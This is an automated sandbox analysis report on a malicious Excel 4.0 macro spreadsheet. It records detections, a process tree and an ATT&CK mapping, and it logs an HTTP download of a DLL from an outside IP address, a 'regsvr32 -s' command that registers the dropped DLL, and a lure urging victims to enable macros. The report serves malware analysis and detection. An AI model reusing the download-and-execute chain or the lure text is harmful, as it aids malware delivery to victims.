
# Analysis Report Delivery_Information_7038598.xlsb

## Overview

### General Information

Sample Name: Delivery_Information_7038598.xlsb
Analysis ID: 432152
MD5: aa12a71a4c31152958b75aa2cc0dd605
SHA1: 1709bd79ab07bc915d19b351a0c6000fafb91d70
SHA256: 201d6c214af9eea64e1882a17b2b14a789c50aa6202192b5474cd890bae4f1bf

### Detection

Hidden Macro 4.0
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

### Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Checks if the current process is being debugged
Drops PE files
Drops PE files to the user directory
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Xls With Macro 4.0

### Classification

System is w10x64

Process tree:

- EXCEL.EXE (PID: 6536, cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, MD5: 5D6638F2C8F8571C593999C58866007E)
  - regsvr32.exe (PID: 3144, cmdline: regsvr32 -s ..\kdldyeff.dll, MD5: 426E7499F6A7346F0410DEAD0805586B)

## Malware Configuration

No configs have been found
## Yara Overview

| Source | Rule | Description | Author | Strings |
| --- | --- | --- | --- | --- |
| app.xml | JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security | |

## Sigma Overview

### System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell

Source: Process started
Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team
Data:
- Command: regsvr32 -s ..\kdldyeff.dll
- CommandLine: regsvr32 -s ..\kdldyeff.dll
- CommandLine|base64offset|contains: ,
- Image: C:\Windows\SysWOW64\regsvr32.exe
- NewProcessName: C:\Windows\SysWOW64\regsvr32.exe
- OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe
- ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
- ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
- ParentProcessId: 6536
- ProcessCommandLine: regsvr32 -s ..\kdldyeff.dll
- ProcessId: 3144

## Signature Overview

Uses new MSVCR Dlls

### Software Vulnerabilities:

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: sat1_0609_2[1].dll.0.dr
Document exploit detected (process start blacklist hit)
  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe
Potential document exploit detected (performs HTTP gets)
  Source: global traffic TCP traffic: 192.168.2.4:49747 -> 185.180.199.121:80
Potential document exploit detected (unknown TCP traffic)
  Source: global traffic TCP traffic: 192.168.2.4:49747 -> 185.180.199.121:80
  Source: global traffic HTTP traffic detected:
    HTTP/1.1 200 OK
    Date: Wed, 09 Jun 2021 17:46:14 GMT
    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.3.28
    Last-Modified: Wed, 09 Jun 2021 13:51:29 GMT
    ETag: "62de0-5c4559247da40"
    Accept-Ranges: bytes
    Content-Length: 404960
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: application/octet-stream
    Data Raw: (hex dump omitted; the response body begins with an MZ/PE header)
Uses a known web browser user agent for HTTP communication
  Source: global traffic HTTP traffic detected:
    GET /sat1_0609_2.dll HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 185.180.199.121
    Connection: Keep-Alive
Connects to IPs without corresponding DNS lookups
  Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 (this entry is repeated for every connection in the report)
  Source: global traffic HTTP traffic detected:
    GET /sat1_0609_2.dll HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 185.180.199.121
    Connection: Keep-Alive
URLs found in memory or binary data

### System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
  Source: Screenshot number: 4 Screenshot OCR: Enable editing " to unlock the editing document downloaded from the ir 13 14 Protected View This f
  Source: Screenshot number: 4 Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start " 18 the decryption of the doc
Found Excel 4.0 Macro with suspicious formulas
  Source: Delivery_Information_7038598.xlsb Initial sample: CALL
  Source: Delivery_Information_7038598.xlsb Initial sample: CALL
  Source: Delivery_Information_7038598.xlsb Initial sample: EXEC
Office process drops PE file
  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\kdldyeff.dll
  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\sat1_0609_2[1].dll
Tries to load missing DLLs
Classification label
  Source: classification engine Classification label: mal88.expl.evad.winXLSB@3/11@0/1
Creates files inside the user directory
Creates temporary files
  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\{7BE2EDF5-A9C4-4DEF-9DC0-1522802C2D95} - OProcSessId.dat
Spawns processes
  Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dll
Found graphical window changes (likely an installer)
  Source: Window Recorder Window detected: More than 3 window changes detected
Document is a ZIP file with path names indicative of goodware
  Source: Delivery_Information_7038598.xlsb Initial sample: OLE zip file path = xl/media/image1.png
  Source: Delivery_Information_7038598.xlsb Initial sample: OLE zip file path = xl/media/image2.png
  Source: Delivery_Information_7038598.xlsb Initial sample: OLE zip file path = xl/media/image3.png
  Source: Delivery_Information_7038598.xlsb Initial sample: OLE zip file path = xl/media/image4.png
  Source: Delivery_Information_7038598.xlsb Initial sample: OLE zip file path = xl/media/image5.png
Checks if Microsoft Office is installed
Uses new MSVCR Dlls
Registers a DLL
  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dll
Uses code obfuscation techniques (call, push, ret)
  Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_03042ABC push dword ptr [edx+14h]; ret 2_2_03042BFD
Drops PE files
  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\kdldyeff.dll
  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\sat1_0609_2[1].dll
Drops PE files to the user directory
  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\kdldyeff.dll

### Boot Survival:

Drops PE files to the user root directory
  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\kdldyeff.dll
Disables application error messages (SetErrorMode)
Found dropped PE file which has not been started or loaded
  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\sat1_0609_2[1].dll
May sleep (evasive loops) to hinder dynamic analysis
Contains medium sleeps (>= 30s)
Checks if the current process is being debugged
Yara detected Xls With Macro 4.0
  Source: Yara match File source: app.xml, type: SAMPLE

## Mitre Att&ck Matrix

Numbers in parentheses are the matrix's match-count badges for techniques observed in this analysis.

| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Valid Accounts | Scripting (1) | DLL Side-Loading (1) | Process Injection (1) | Masquerading (1, 1, 1) | OS Credential Dumping | Security Software Discovery (1) | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Ingress Tool Transfer (1, 1) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
| Default Accounts | Exploitation for Client Execution (4, 2) | Boot or Logon Initialization Scripts | DLL Side-Loading (1) | Disable or Modify Tools (1) | LSASS Memory | Virtualization/Sandbox Evasion (2, 1) | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol (1) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion (2, 1) | Security Account Manager | File and Directory Discovery (1) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol (2, 1) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection (1) | NTDS | System Information Discovery (2) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud |
| Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting (1) | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
| Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information (1) | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
| External Remote Services | Scheduled Task | Startup Items | Startup Items | Regsvr32 (1) | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |